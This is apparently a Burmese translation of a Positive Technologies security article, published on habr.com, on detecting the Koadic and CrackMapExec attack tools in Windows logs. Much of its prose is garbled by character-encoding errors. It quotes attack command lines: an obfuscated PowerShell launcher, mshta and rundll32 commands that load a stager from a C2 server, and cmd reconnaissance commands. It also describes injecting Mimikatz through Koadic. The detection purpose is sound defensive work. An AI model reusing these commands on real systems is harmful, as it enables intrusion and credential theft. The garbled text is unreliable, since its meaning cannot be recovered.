. áááºážááŸáá·áºáááºáááºáá±á¬ ááŸááºáá¬ážááœááºá¡áá»ááºááŸá¬ command line arguments áá»á¬ážááŒá
áºááẠá
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , ⊠, 40,41 )-jOIN'' ) "
Enum_av áá¯ááºáá¯ááºáá»á¬áž
enum_avproducts module ááẠáá¯ááºáá±á¬ááºááá¯ááºá áœááºážááŸáá·áº á¡áá±á¬ááºá¡áááºáá±á¬áºááŸá¯áááŸá¯áá±á¬áá·áºá០á¡ááœááºá áááºáááºá á¬ážá áá¬áá±á¬ááºážáá«áááºá WMI ááẠááá·áºá¡á¬áž WQL query language ááᯠá¡áá¯á¶ážááŒá¯ááẠááœáá·áºááŒá¯áá¬ážááŒá®ážá áááºážááẠဠCME module á áááŸááááŒá áºááá¯á¡ááºáá±á¬ á¡áá¬ááŒá áºááẠáááºážááẠáá¬ážáá±á¬ááºáá ááºááœáẠáááºáááºáá¬ážááá·áº á¡áá¬á¡ááœááºáááááá¬áá»á¬ážá¡ááŒá±á¬ááºáž AntiSpywareProduct ááŸáá·áº AntiÐirusProduct á¡áááºážáá»á¬ážááá¯á· áá±ážááŒááºážááŸá¯áá»á¬ážááᯠáá¯ááºáá±ážáááºá ááá¯á¡ááºáá±á¬áá±áá¬ááá¯ááá°áááºá¡ááœááºá áá±á¬áºáá»á°ážááẠrootSecurityCenter2 namespace ááá¯á·áá»áááºáááºááŒá®ážá ááá¯á·áá±á¬áẠWQL áá±ážááœááºážáá áºáá¯áá¯ááºáá±ážááŒá®áž áá¯á¶á·ááŒááºááŸá¯ááá¯áááºáá¶áááºá áá¯á¶ááœááºá áá¯á¶ 9 ááẠááá¯ááá¯á·áá±á¬ áá±á¬ááºážááá¯áá»ááºáá»á¬ážááŸáá·áº áá¯á¶á·ááŒááºááŸá¯áá»á¬ážá á¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááᯠááŒáá¬ážáááºá áá»áœááºá¯ááºááá¯á·áá¥ááá¬ááœáẠWindows Defender ááá¯ááœá±á·ááŸááá²á·áááºá
ááááºážá 9. enum_avproducts module á ááœááºáááºáá¯ááºáá±á¬ááºáá»ááº
áááŒá¬áá WMI á á áºáá±ážááŸá¯ (Trace WMI-Activity) ááẠWQL á á¯á¶á ááºážááŸá¯áá»á¬ážááŸáá·áºáááºáááºáá±á¬ á¡áá¯á¶ážáááºáá±á¬á¡áá»ááºá¡áááºáá»á¬ážááᯠáááºááŸá¬ááœá±ááá¯ááºááá·áº ááŒá áºáááºáá»á¬ážááœáẠááááºáá¬ážááá¯ááºáááºá ááá¯á·áá±á¬áº áááºážááá¯ááœáá·áºáá¬ážáá»áŸáẠenum_avproducts script ááᯠrun áá«á ID 11 áá«áá±á¬ááŒá áºáááºááᯠááááºážáááºážáááºááŒá áºáááºá áááºážááœáẠáá±á¬ááºážááá¯áá»ááºáá±ážááá¯á·áá±á¬á¡áá¯á¶ážááŒá¯áá°á¡áááºááŸáá·áº rootSecurityCenter2 namespace ááœááºá¡áááºáá«ááŸááááºá
CME áá±á¬áºáá»á°ážáá áºáá¯á á®ááœáẠLDAP ááŸáá·áº SMB ááŸá Bloodhound-specific áá¯ááºáá±á¬ááºáá»ááºáá«ááŸááá±á¬ á¡áá¯ááºáá»áááºááá¬ážá áá áºááœáẠáááºááŸááºáá¬ážáá±á¬ WQL áá±ážááŒááºážááŸá¯áá»á¬áž ááá¯á·ááá¯áẠá¡áá¯ááºá¡áá»áá¯ážá¡á á¬ážáá áºáá¯áááºáá®ážááŒááºážáá²ááŒá áºááŒá áºá LDAP ááŸáá·áº SMB ááŸá Bloodhound-specific áá¯ááºáá±á¬ááºáá»ááºáá«ááŸááá±á¬ CME module áá áºáá¯á á®ááœáẠáááºážáááá¯ááºááá¯ááºáááºáá¬áá»á¬ážááŸááááºá
KOADIC
Koadic ááá°ážááŒá¬ážáá±á¬á¡ááºá¹áá«áááºááŸá¬ Windows ááœááºáááºáá±á¬ááºáá¬ážáá±á¬ JavaScript ááŸáá·áº VBScript á áá¬ážááŒááºáá»á¬ážááá¯á¡áá¯á¶ážááŒá¯ááŒááºážááŒá áºáááºá á€ááá±á¬á¡áá áááºážááẠááŒááºáá¡á¬ážááá¯ážááŸá¯áááŸááá² áá¯á¶ááŸáẠWindows áááááá¬áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯á ááŒá±áá¬áááºážááŒá±á¬ááºážááᯠááá¯ááºáá»á±á¬áá®ááœá±ááŒá áºá á±áááºá áá±á¬áá«ááá¯ážáá°ážá ááºááŒá®ážáá±á¬áẠá ááºáá±á«áºááœáẠ"implant" ááᯠáááºáááºáá¬ážáá±á¬ááŒá±á¬áá·áº ááááºážáá»á¯ááºááá¯ááºá á±ááá·áº Command & Control (CnC) á¡ááŒáá·áºá¡á á¯á¶á¡ááœáẠáááááá¬áá áºáá¯ááŒá áºáááºá Koadic áá±á«áá¬áá¡á ááá¯áá²á·ááá¯á·áá±á¬á ááºááᯠ"áá¯ááºáá±á¬ááº" áá¯áá±á«áºáááºá áá¬ážáá±á¬ááºááááºááœáẠá¡ááŒáá·áºá¡ááááºáááºáááºá¡ááœáẠá¡ááœáá·áºá¡áá±ážáá»á¬áž ááá¯á¶áá±á¬ááºáá«áá Koadic ááẠUser Account Control bypass (UAC bypass) áááºážááá¬áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯á áááºážááá¯á·ááᯠááŒáŸáá·áºáááºááá¯ááºáááºááŒá áºáááºá
ááááºážá 10. Koadic Shell
áá¬ážáá±á¬ááºááẠCommand & Control áá¬áá¬ááŸáá·áº áááºááœááºááŸá¯ á áááºááá«áááºá áááºážááá¯áá¯ááºáá±á¬ááºáááºá áá°áááẠááááºááŒááºáááºáá¬ážááá·áº URI ááá¯áááºááœááºááŒá®áž stagers áá»á¬ážáá²ááŸáá áºáá¯ááá¯á¡áá¯á¶ážááŒá¯á áááºá Koadic ááá¯ááºáááºááá¯ááá°áááºááá¯á¡ááºáááºá áá¯á¶ááœááºá áá¯á¶ 11 ááẠmshta stager á¡ááœáẠá¥ááá¬áá áºáá¯ááŒáááºá
ááááºážá 11. CnC áá¬áá¬ááŒáá·áº á
ááºááŸááºáá
áºáá¯ááᯠá
áááºááŒááºážá
áá¯á¶á·ááŒááºááŸá¯ááŒá±á¬ááºážáá²ááá¯ááºáá±á¬ WS ááá¯á¡ááŒá±áá¶á áá¯ááºáá±á¬ááºáá»ááºááẠWScript.Shell ááŸáááá·áºááŒá áºáá±á«áºááŒá±á¬ááºáž ááŸááºážááŸááºážáááºážáááºážááŒá áºáá¬ááŒá®áž STAGERá SESSIONKEYá JOBKEYá JOBKEYPATHá EXPIRE ááœáẠáááºááŸáá ááºááŸááºá ááá·áºáááºáá±á¬ááºáá»á¬ážááá¯ááºáᬠá¡áááá¡áá»ááºá¡áááºáá»á¬áž áá«áááºáá«áááºá áááºážááẠCnC áá¬áá¬ááŸáá·áº HTTP áá»áááºáááºááŸá¯ááœáẠááááá¯á¶áž áá±á¬ááºážááá¯áá»ááº-áá¯á¶á·ááŒááºááŸá¯á¡ááœá²ááŒá áºáááºá áá±á¬ááºáááºááœá²áá±á¬ááºážááá¯áá»ááºáá»á¬ážááẠáá±á¬áºáá»á°ážáá»á¬áž (implants) áá¯áá±á«áºáá±á¬ áá¯ááºáá±á¬ááºááá¯ááºá áœááºážááŸáá·áº ááá¯ááºááá¯ááºáááºááá¯ááºáá«áááºá Koadic modules áá»á¬ážá¡á¬ážáá¯á¶ážááẠCnC ááŸáá·áº áááºááŒáœáá±á¬ session áá áºáá¯ááŒáá·áºáᬠá¡áá¯ááºáá¯ááºáá«áááºá
áá®áá®áááºááº
CME ááẠBloodhound ááŸáá·áºá¡áá¯ááºáá¯ááºááá²á·ááá¯á· Koadic ááẠáá®ážááŒá¬ážáááá¯ááááºáá áºáá¯á¡áá±ááŒáá·áº Mimikatz ááŸáá·áºá¡áá¯ááºáá¯ááºááŒá®áž áááºážááá¯á áááºááẠáááºážáááºážáá»á¬ážá áœá¬ááŸááááºá á¡á±á¬ááºááœáẠMimikatz implant ááá¯áá±á«ááºážáá¯ááºáá¯ááºáááºá¡ááœáẠáá±á¬ááºážááá¯áá»ááº-áá¯á¶á·ááŒááºááŸá¯á¡ááœá²áá áºáá¯ááŒá áºáááºá
ááááºážá 12. Mimikatz ááᯠKoadic ááá¯á· ááœáŸá²ááŒá±á¬ááºážáá«á
áá±á¬ááºážááá¯áá»ááºááŸá URI áá±á¬áºáááºááẠááŒá±á¬ááºážáá²ááœá¬ážáááºááᯠáááºááŒááºááá¯ááºáááºá ááᯠáááºážááœáẠááœá±ážáá»ááºáá¬ážáá±á¬ module á¡ááœáẠáá¬áááºááŸáááá·áº csrf variable á¡ááœáẠáááºááá¯ážáá áºáá¯áá«ááŸááááºá áá°ááá¡áááºááᯠááá¯áá áá¯ááºáá«ááŸáá·áºá CSRF ááᯠá¡áá»á¬ážá¡á¬ážááŒáá·áº ááœá²ááŒá¬ážá áœá¬ áá¬ážáááºááŒáááºááᯠáá»áœááºá¯ááºááá¯á·á¡á¬ážáá¯á¶áž áááá«áááºá áá¯á¶á·ááŒááºááŸá¯ááẠKoadic á áááºáááá¯ááºáááºááŒá áºááŒá®ážá Mimikatz ááŸáá·áºáááºá ááºáá±á¬áá¯ááºááᯠááá·áºááœááºážáá¬ážáááºá áááºážááẠá¡ááœááºááŒá®ážáá¬ážáá±á¬ááŒá±á¬áá·áº á¡áááá¡áá»ááºáá»á¬ážááᯠááŒáá·áºááŒáá«á áá¯á·á á€áá±áá¬ááœáẠáá»áœááºá¯ááºááá¯á·ááœáẠMimikatz á á¬ááŒáá·áºááá¯ááºááᯠááá·áºááœááºážááá·áº base64 ááœáẠáá¯ááºáá¶áá«ááºáááºáá¬ážáá±á¬ .NET á¡áááºážá¡á á¬ážááŸáá·áº Mimikatz ááᯠá áááºááẠá¡ááŒá±á¬ááºážááŒáá»ááºáá»á¬ážááŸááááºá áá¯ááºáá±á¬ááºááŸá¯ááááºááᯠááŸááºážáááºážáá±á¬á á¬áá¬ážááŒáá·áº ááœááºáááºáá±á«áºááœáẠáá¯ááºááœáŸáá·áºáááºá
ááááºážá 13. á¡áá±ážááááºážá
ááºáá±á«áºááœáẠMimikatz ááá¯á¡áá¯á¶ážááŒá¯ááŒááºážáááááº
Exec_cmd
Koadic ááœáẠá¡áá±ážá០á¡áááá·áºáá±ážáá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºááá¯ááºáá±á¬ module áá»á¬ážáááºáž ááŸááá«áááºá á€áá±áá¬ááœáẠáá°áá®áá±á¬ URI áá»áá¯ážáááºáááºážáááºážááŸáá·áº áááºážááŸá®ážáá±á¬ sid ááŸáá·áº csrf variables áá»á¬ážááᯠááœá±á·ááááºááŒá áºáá«áááºá exec_cmd module áá¡ááŒá±á¡áá±ááœááºá shell command áá»á¬ážááá¯áá¯ááºáá±á¬ááºááá¯ááºáá±á¬ááá¯ááºáááºáá²ááá¯á· code áá±á«ááºážááá·áºáááºá á¡á±á¬ááºááœáẠCnC áá¬áá¬á HTTP áá¯á¶á·ááŒááºááŸá¯ááœááºáá«ááŸááá±á¬ ááá¯áá¯ááºááᯠááŒáá¬ážáááºá
ááááºážá 14. Implant áá¯áẠexec_cmd
áá¯ááºáá¯ááºáá±á¬ááºááŸá¯á¡ááœáẠáááºážááŸá®ážáá±á¬ WS áááºááœáŸááºážáá»ááºáá«áá±á¬ GAWTUUGCFI ááááºážááŸááºááẠááá¯á¡ááºáá«áááºá áááºážáá¡áá°á¡áá®ááŒáá·áºá implant ááẠshell ááá¯áá±á«áºááá¯ááŒá®áž output data stream ááŸáá·áº shell.run ááá¯á·ááá¯ááŒááºááŒááºážáááŸááá² code áá¡ááá¯ááºážá¡áááºááŸá áºáᯠ- shell.exec ááá¯áá¯ááºáá±á¬ááºáááºá
Koadic ááẠáá¯á¶ááŸááºáááááá¬áá áºáá¯ááá¯ááºáá±á¬áºáááºáž áááºážááœááºááá¬ážáááºá¡ááœá¬ážá¡áá¬ááœááºááœá±á·ááŸáááá¯ááºááá·áº áááºážáááá¯ááºááá¯ááºáááºáá¬áá»á¬ážááŸááááºá
- HTTP áá±á¬ááºážááá¯ááŸá¯áá»á¬ážá á¡áá°ážááœá²á·á ááºážááŸá¯á
- winHttpRequests API ááá¯áá¯á¶ážááŒá®ážá
- ActiveXObject ááŸáááá·áº WScript.Shell á¡áá¬ááá¹áá¯ááᯠáááºáá®ážááŒááºážá
- ááŒá®ážáá¬ážáá±á¬á¡áá±á¬ááºáááºáá±á¬áºááá¯ááºáá±á¬ááá¯ááºáááºá
áááŠážáá»áááºáááºááŸá¯ááᯠStager á០á¡á ááŒá¯áá¬ážáá±á¬ááŒá±á¬áá·áº Windows ááŒá áºáááºáá»á¬ážááŸáá áºááá·áº áááºážááá¯ááºáá±á¬ááºáá»ááºááᯠááááŸáááá¯ááºáááºá mshta á¡ááœááºá á€áááºááŸá¬ event 4688 ááŒá áºááŒá®ážá start attribute ááŒáá·áº process áá áºáá¯áááºáá®ážááŒááºážááᯠááœáŸááºááŒáááº-
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
Koadic áááºáááºáá±áá»áááºááœááºá áááºážááᯠááŒá®ážááŒáá·áºá á¯á¶áá±á¬ ááœááºááŒááºááá¹ááá¬áá»á¬ážááŒáá·áº á¡ááŒá¬áž 4688 ááŒá áºáááºáá»á¬ážááᯠáááºááœá±á·ááŒááºááá¯ááºáááº-
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
ááœá±á·ááŸááá»ááºáá»á¬áž
áá¬ááááºáá±á¬ááºáá»á¬ážááŒá¬ážááœáẠááá¯ááºáá°ááá¯ááºááááºážááŒá±á¬ááºážááẠáá±áááºážá
á¬ážáá¬áááºá áááºážááá¯á·ááẠáááºážááá¯á·áááá¯á¡ááºáá»ááºáá»á¬ážá¡ááœáẠWindows ááœáẠáááºáá±á¬ááºáá¬ážáá±á¬ áááááá¬áá»á¬ážááŸáá·áº ááá¹ááá¬ážáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááŒáááºá á€áá°á¡á APT á¡á
á®áááºáá¶á
á¬áá»á¬ážááœáẠááá¯ááá¯áááºááŸá¬ážáá¬ááŒá®ážáá±á¬áẠáá¬áááºááŒá®ážáááááᬠKoadicá CrackMapExec ááŸáá·áº Impacket ááá¯á·ááᯠáá»áœááºá¯ááºááá¯á· ááœá±á·ááŒááºáá±ááááºá á€áááááá¬áá»á¬ážá¡ááœáẠGitHub ááŸá áááºáááºážá¡áá±á¡ááœááºáááºáž ááá¯ážáá¬áá±ááŒá®áž á¡áá
áºáá»á¬áž áá±á«áºáá¬ááẠ(ááᯠáááºážááá¯á·á¡áááºá០áá
áºáá±á¬ááºááá·áºááŸááá±ááŒá®)á áááºážááŒá±á¬ááºážááẠáááºážáááá¯ážááŸááºážááŸá¯ááŒá±á¬áá·áº áá°ááŒáá¯ááºáá»á¬ážáá¬áááº- ááá¯ááºááá¯ááºáá°áá»á¬ážááẠááŒááºááááááá¬áá»á¬áž áááá¯á¡ááºáá«á áááºážááá¯á·ááẠáá¬ážáá±á¬ááºáá»á¬ážá á
ááºáá»á¬ážááœáẠááŸáááŸáá·áºááŒá®ážááŒá
áºáᬠáá¯á¶ááŒá¯á¶áá±ážá¡á
á®á¡áá¶áá»á¬ážááᯠáá»á±á¬áºááœáŸá¬ážááá¯ááºááẠáá°áá®áá±ážáá«áááºá áá»áœááºá¯ááºááá¯á·ááẠááœááºáááºáááºááœááºáá±ážááᯠáá±á·áá¬ááẠá¡á¬áá¯á¶á
áá¯ááºáááº- á¡áááºááœááºáá±á¬áºááŒáá¬ážáá±á¬ áááááá¬áá
áºáá¯á
á®ááẠááœááºáááºá¡ááœá¬ážá¡áá¬ááœáẠáááºážáááá¯ááºááá¯ááºááŒá±áá¬áá»á¬ážááᯠáá»ááºáá¬ážáá²á·áááºá áááºážááá¯á·ááᯠá¡áá±ážá
áááºáá±á·áá¬ááŒááºážááŒáá·áº áá»áœááºá¯ááºááá¯á·ááá¯ááºáá¯ááºááᯠáááºááŒá¬ážááá¯ááºá
á±áá«áááºá
á á¬áá±ážááá¬áá»á¬áž:
- Anton Tyuriná áá»áœááºážáá»ááºáááºáá±á¬ááºááŸá¯áá¬ááá¡ááŒá®ážá¡áá²á PT Expert áá¯á¶ááŒá¯á¶áá±ážá ááºáá¬á á¡ááŒá¯ááá±á¬áá±á¬ááºáá±á¬áááºážááá¬áá»á¬áž
- Egor Podmoková áá»áœááºážáá»ááºáá°á PT Expert Security Centerá Positive Technologies
source: www.habr.com